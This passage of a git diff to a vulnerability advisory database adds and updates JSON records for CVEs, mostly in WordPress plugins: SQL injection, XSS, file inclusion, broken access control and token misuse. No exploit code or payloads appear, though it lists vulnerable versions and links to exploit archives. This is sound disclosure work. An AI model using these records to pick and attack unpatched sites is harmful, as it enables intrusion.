"https://github.com/0xbigshaq/CVE-2025-25257" }, + { + "type": "WEB", + "url": "https://packetstorm.news/files/id/210193" + }, { "type": "WEB", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-25257" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/52473" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/12/GHSA-7365-jmqc-qf8w/GHSA-7365-jmqc-qf8w.json b/advisories/unreviewed/2025/12/GHSA-7365-jmqc-qf8w/GHSA-7365-jmqc-qf8w.json index ca3e5efac004d..759a71fdebf05 100644 --- a/advisories/unreviewed/2025/12/GHSA-7365-jmqc-qf8w/GHSA-7365-jmqc-qf8w.json +++ b/advisories/unreviewed/2025/12/GHSA-7365-jmqc-qf8w/GHSA-7365-jmqc-qf8w.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-290" + "CWE-290", + "CWE-451" ], "severity": "LOW", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-23vm-r6m3-8q9g/GHSA-23vm-r6m3-8q9g.json b/advisories/unreviewed/2026/02/GHSA-23vm-r6m3-8q9g/GHSA-23vm-r6m3-8q9g.json new file mode 100644 index 0000000000000..bab79c16a8bb7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-23vm-r6m3-8q9g/GHSA-23vm-r6m3-8q9g.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-23vm-r6m3-8q9g", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22350" + ], + "details": "Missing Authorization vulnerability in add-ons.org PDF for Elementor Forms + Drag And Drop Template Builder pdf-for-elementor-forms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PDF for Elementor Forms + Drag And Drop Template Builder: from n/a through <= 6.3.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22350" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/pdf-for-elementor-forms/vulnerability/wordpress-pdf-for-elementor-forms-drag-and-drop-template-builder-plugin-6-3-1-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-256m-r39j-gmcw/GHSA-256m-r39j-gmcw.json b/advisories/unreviewed/2026/02/GHSA-256m-r39j-gmcw/GHSA-256m-r39j-gmcw.json new file mode 100644 index 0000000000000..a7631a90657e5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-256m-r39j-gmcw/GHSA-256m-r39j-gmcw.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-256m-r39j-gmcw", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69304" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Allmart allmart-core allows Blind SQL Injection.This issue affects Allmart: from n/a through <= 1.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69304" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/allmart-core/vulnerability/wordpress-allmart-plugin-1-1-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-279c-6crv-5wxc/GHSA-279c-6crv-5wxc.json b/advisories/unreviewed/2026/02/GHSA-279c-6crv-5wxc/GHSA-279c-6crv-5wxc.json new file mode 100644 index 0000000000000..936fd65d0151c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-279c-6crv-5wxc/GHSA-279c-6crv-5wxc.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-279c-6crv-5wxc", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69390" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in themebon Business Template Blocks for WPBakery (Visual Composer) Page Builder templates-and-addons-for-wpbakery-page-builder allows Reflected XSS.This issue affects Business Template Blocks for WPBakery (Visual Composer) Page Builder: from n/a through <= 1.3.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69390" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/templates-and-addons-for-wpbakery-page-builder/vulnerability/wordpress-business-template-blocks-for-wpbakery-visual-composer-page-builder-plugin-1-3-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-27v4-jx99-gfh6/GHSA-27v4-jx99-gfh6.json b/advisories/unreviewed/2026/02/GHSA-27v4-jx99-gfh6/GHSA-27v4-jx99-gfh6.json index 1cd31c4a54fca..6a39fb3641362 100644 --- a/advisories/unreviewed/2026/02/GHSA-27v4-jx99-gfh6/GHSA-27v4-jx99-gfh6.json +++ b/advisories/unreviewed/2026/02/GHSA-27v4-jx99-gfh6/GHSA-27v4-jx99-gfh6.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-27v4-jx99-gfh6", - "modified": "2026-02-19T21:30:48Z", + "modified": "2026-02-20T18:31:32Z", "published": "2026-02-19T21:30:48Z", "aliases": [ "CVE-2026-27360" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in 10Web Photo Gallery by 10Web photo-gallery allows Stored XSS.This issue affects Photo Gallery by 10Web: from n/a through <= 1.8.37.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T21:18:32Z" diff --git a/advisories/unreviewed/2026/02/GHSA-28ww-g7m4-w94r/GHSA-28ww-g7m4-w94r.json b/advisories/unreviewed/2026/02/GHSA-28ww-g7m4-w94r/GHSA-28ww-g7m4-w94r.json new file mode 100644 index 0000000000000..78b4409856a12 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-28ww-g7m4-w94r/GHSA-28ww-g7m4-w94r.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-28ww-g7m4-w94r", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2025-60183" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in silence Silencesoft RSS Reader external-rss-reader allows Stored XSS.This issue affects Silencesoft RSS Reader: from n/a through <= 0.6.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60183" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/external-rss-reader/vulnerability/wordpress-silencesoft-rss-reader-plugin-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-29xg-2j5g-mj8g/GHSA-29xg-2j5g-mj8g.json b/advisories/unreviewed/2026/02/GHSA-29xg-2j5g-mj8g/GHSA-29xg-2j5g-mj8g.json new file mode 100644 index 0000000000000..f09cb0995facc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-29xg-2j5g-mj8g/GHSA-29xg-2j5g-mj8g.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-29xg-2j5g-mj8g", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68531" + ], + "details": "Deserialization of Untrusted Data vulnerability in modeltheme ModelTheme Addons for WPBakery and Elementor modeltheme-addons-for-wpbakery allows Object Injection.This issue affects ModelTheme Addons for WPBakery and Elementor: from n/a through < 1.5.6.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68531" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/modeltheme-addons-for-wpbakery/vulnerability/wordpress-modeltheme-addons-for-wpbakery-and-elementor-plugin-1-5-6-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2c3x-rrq4-j7xg/GHSA-2c3x-rrq4-j7xg.json b/advisories/unreviewed/2026/02/GHSA-2c3x-rrq4-j7xg/GHSA-2c3x-rrq4-j7xg.json new file mode 100644 index 0000000000000..8a7447261405a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2c3x-rrq4-j7xg/GHSA-2c3x-rrq4-j7xg.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2c3x-rrq4-j7xg", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22369" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Ironfit ironfit allows PHP Local File Inclusion.This issue affects Ironfit: from n/a through <= 1.5.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22369" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/ironfit/vulnerability/wordpress-ironfit-theme-1-5-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2cpq-4q56-fghm/GHSA-2cpq-4q56-fghm.json b/advisories/unreviewed/2026/02/GHSA-2cpq-4q56-fghm/GHSA-2cpq-4q56-fghm.json index 8886e79c92150..132f4d496f408 100644 --- a/advisories/unreviewed/2026/02/GHSA-2cpq-4q56-fghm/GHSA-2cpq-4q56-fghm.json +++ b/advisories/unreviewed/2026/02/GHSA-2cpq-4q56-fghm/GHSA-2cpq-4q56-fghm.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-2cpq-4q56-fghm", - "modified": "2026-02-19T18:31:53Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:53Z", "aliases": [ "CVE-2026-25472" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeFusion Fusion Builder fusion-builder allows Stored XSS.This issue affects Fusion Builder: from n/a through <= 3.14.3.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:25Z" diff --git a/advisories/unreviewed/2026/02/GHSA-2cv8-fr2g-g66g/GHSA-2cv8-fr2g-g66g.json b/advisories/unreviewed/2026/02/GHSA-2cv8-fr2g-g66g/GHSA-2cv8-fr2g-g66g.json new file mode 100644 index 0000000000000..276bd8463cd37 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2cv8-fr2g-g66g/GHSA-2cv8-fr2g-g66g.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2cv8-fr2g-g66g", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69366" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Emerce Core emerce-core allows Blind SQL Injection.This issue affects Emerce Core: from n/a through <= 1.8.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69366" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/emerce-core/vulnerability/wordpress-emerce-core-plugin-1-8-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2fcj-pq3f-v8fp/GHSA-2fcj-pq3f-v8fp.json b/advisories/unreviewed/2026/02/GHSA-2fcj-pq3f-v8fp/GHSA-2fcj-pq3f-v8fp.json index 0cc626d72fc5b..87df449b47a04 100644 --- a/advisories/unreviewed/2026/02/GHSA-2fcj-pq3f-v8fp/GHSA-2fcj-pq3f-v8fp.json +++ b/advisories/unreviewed/2026/02/GHSA-2fcj-pq3f-v8fp/GHSA-2fcj-pq3f-v8fp.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-2fcj-pq3f-v8fp", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25364" ], "details": "Missing Authorization vulnerability in BoldGrid Client Invoicing by Sprout Invoices sprout-invoices allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Client Invoicing by Sprout Invoices: from n/a through <= 20.8.8.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:19Z" diff --git a/advisories/unreviewed/2026/02/GHSA-2rf2-f6mm-2232/GHSA-2rf2-f6mm-2232.json b/advisories/unreviewed/2026/02/GHSA-2rf2-f6mm-2232/GHSA-2rf2-f6mm-2232.json new file mode 100644 index 0000000000000..5a2645e276c5e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2rf2-f6mm-2232/GHSA-2rf2-f6mm-2232.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2rf2-f6mm-2232", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69325" + ], + "details": "Path Traversal: '.../...//' vulnerability in primersoftware Primer MyData for Woocommerce primer-mydata allows Path Traversal.This issue affects Primer MyData for Woocommerce: from n/a through <= 4.2.8.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69325" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/primer-mydata/vulnerability/wordpress-primer-mydata-for-woocommerce-plugin-4-2-8-path-traversal-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-35" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2rfp-jrr8-m33f/GHSA-2rfp-jrr8-m33f.json b/advisories/unreviewed/2026/02/GHSA-2rfp-jrr8-m33f/GHSA-2rfp-jrr8-m33f.json index db28de7be18e1..847458f3541ad 100644 --- a/advisories/unreviewed/2026/02/GHSA-2rfp-jrr8-m33f/GHSA-2rfp-jrr8-m33f.json +++ b/advisories/unreviewed/2026/02/GHSA-2rfp-jrr8-m33f/GHSA-2rfp-jrr8-m33f.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-2rfp-jrr8-m33f", - "modified": "2026-02-19T18:31:51Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:51Z", "aliases": [ "CVE-2026-25008" ], "details": "Insertion of Sensitive Information Into Sent Data vulnerability in Shahjahan Jewel Ninja Tables ninja-tables allows Retrieve Embedded Sensitive Data.This issue affects Ninja Tables: from n/a through <= 5.2.5.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-201" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:14Z" diff --git a/advisories/unreviewed/2026/02/GHSA-2v7m-mcj3-m7h7/GHSA-2v7m-mcj3-m7h7.json b/advisories/unreviewed/2026/02/GHSA-2v7m-mcj3-m7h7/GHSA-2v7m-mcj3-m7h7.json new file mode 100644 index 0000000000000..5dfb584412d72 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2v7m-mcj3-m7h7/GHSA-2v7m-mcj3-m7h7.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2v7m-mcj3-m7h7", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68842" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in totalbounty Widget Logic Visual widget-logic-visual allows Reflected XSS.This issue affects Widget Logic Visual: from n/a through <= 1.52.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68842" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/widget-logic-visual/vulnerability/wordpress-widget-logic-visual-plugin-1-52-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2wf2-988r-jv99/GHSA-2wf2-988r-jv99.json b/advisories/unreviewed/2026/02/GHSA-2wf2-988r-jv99/GHSA-2wf2-988r-jv99.json new file mode 100644 index 0000000000000..62f56fdafcf68 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2wf2-988r-jv99/GHSA-2wf2-988r-jv99.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2wf2-988r-jv99", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69374" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in SolverWp Eleblog – Elementor Blog And Magazine Addons ele-blog allows PHP Local File Inclusion.This issue affects Eleblog – Elementor Blog And Magazine Addons: from n/a through <= 2.0.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69374" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/ele-blog/vulnerability/wordpress-eleblog-elementor-blog-and-magazine-addons-plugin-2-0-3-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2whc-3gm8-r8v3/GHSA-2whc-3gm8-r8v3.json b/advisories/unreviewed/2026/02/GHSA-2whc-3gm8-r8v3/GHSA-2whc-3gm8-r8v3.json new file mode 100644 index 0000000000000..247b941cc007e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2whc-3gm8-r8v3/GHSA-2whc-3gm8-r8v3.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2whc-3gm8-r8v3", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68844" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in DaleAB Membee Login membees-member-login-widget allows Reflected XSS.This issue affects Membee Login: from n/a through <= 2.3.6.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68844" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/membees-member-login-widget/vulnerability/wordpress-membee-login-plugin-2-3-6-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2x2g-fcpp-7fr9/GHSA-2x2g-fcpp-7fr9.json b/advisories/unreviewed/2026/02/GHSA-2x2g-fcpp-7fr9/GHSA-2x2g-fcpp-7fr9.json new file mode 100644 index 0000000000000..4c460d9b9704c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2x2g-fcpp-7fr9/GHSA-2x2g-fcpp-7fr9.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2x2g-fcpp-7fr9", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-1842" + ], + "details": "HyperCloud versions 2.3.5 through 2.6.8 improperly allowed refresh tokens to be used directly for resource access and failed to invalidate previously issued access tokens when a refresh token was used. Because refresh tokens have a significantly longer lifetime (default one year), an authenticated client could use a refresh token in place of an access token to maintain long-term access without token rotation. Additionally, old access tokens remained valid after refresh, enabling concurrent or extended use beyond intended session boundaries. This vulnerability could allow prolonged unauthorized access if a token is disclosed.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1842" + }, + { + "type": "WEB", + "url": "https://advisories.softiron.cloud" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-613" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-343f-9rcg-8p42/GHSA-343f-9rcg-8p42.json b/advisories/unreviewed/2026/02/GHSA-343f-9rcg-8p42/GHSA-343f-9rcg-8p42.json new file mode 100644 index 0000000000000..0fd2b97c7be9c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-343f-9rcg-8p42/GHSA-343f-9rcg-8p42.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-343f-9rcg-8p42", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-24941" + ], + "details": "Missing Authorization vulnerability in wpjobportal WP Job Portal wp-job-portal allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Job Portal: from n/a through <= 2.4.4.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24941" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wp-job-portal/vulnerability/wordpress-wp-job-portal-plugin-2-4-4-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-37wf-f6wc-vqj8/GHSA-37wf-f6wc-vqj8.json b/advisories/unreviewed/2026/02/GHSA-37wf-f6wc-vqj8/GHSA-37wf-f6wc-vqj8.json new file mode 100644 index 0000000000000..8c1589bb0379f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-37wf-f6wc-vqj8/GHSA-37wf-f6wc-vqj8.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-37wf-f6wc-vqj8", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69305" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Crete Core crete-core allows Blind SQL Injection.This issue affects Crete Core: from n/a through <= 1.4.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69305" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/crete-core/vulnerability/wordpress-crete-core-plugin-1-4-3-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-38fx-8cr9-9925/GHSA-38fx-8cr9-9925.json b/advisories/unreviewed/2026/02/GHSA-38fx-8cr9-9925/GHSA-38fx-8cr9-9925.json new file mode 100644 index 0000000000000..cc3933f36feaf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-38fx-8cr9-9925/GHSA-38fx-8cr9-9925.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-38fx-8cr9-9925", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-27072" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PixelYourSite PixelYourSite – Your smart PIXEL (TAG) Manager pixelyoursite allows Stored XSS.This issue affects PixelYourSite – Your smart PIXEL (TAG) Manager: from n/a through <= 11.2.0.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27072" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/pixelyoursite/vulnerability/wordpress-pixelyoursite-your-smart-pixel-tag-manager-plugin-11-2-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-38gw-g59j-rr5c/GHSA-38gw-g59j-rr5c.json b/advisories/unreviewed/2026/02/GHSA-38gw-g59j-rr5c/GHSA-38gw-g59j-rr5c.json new file mode 100644 index 0000000000000..0985a4267f76f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-38gw-g59j-rr5c/GHSA-38gw-g59j-rr5c.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-38gw-g59j-rr5c", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26098" + ], + "details": "Uncontrolled Search Path Element in Owl opds 2.2.0.4 allows Leveraging/Manipulating Configuration File Search Paths via a crafted network request.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26098" + }, + { + "type": "WEB", + "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2026-26098" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-427" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:54Z" + } +} \ No newline at end of file diff 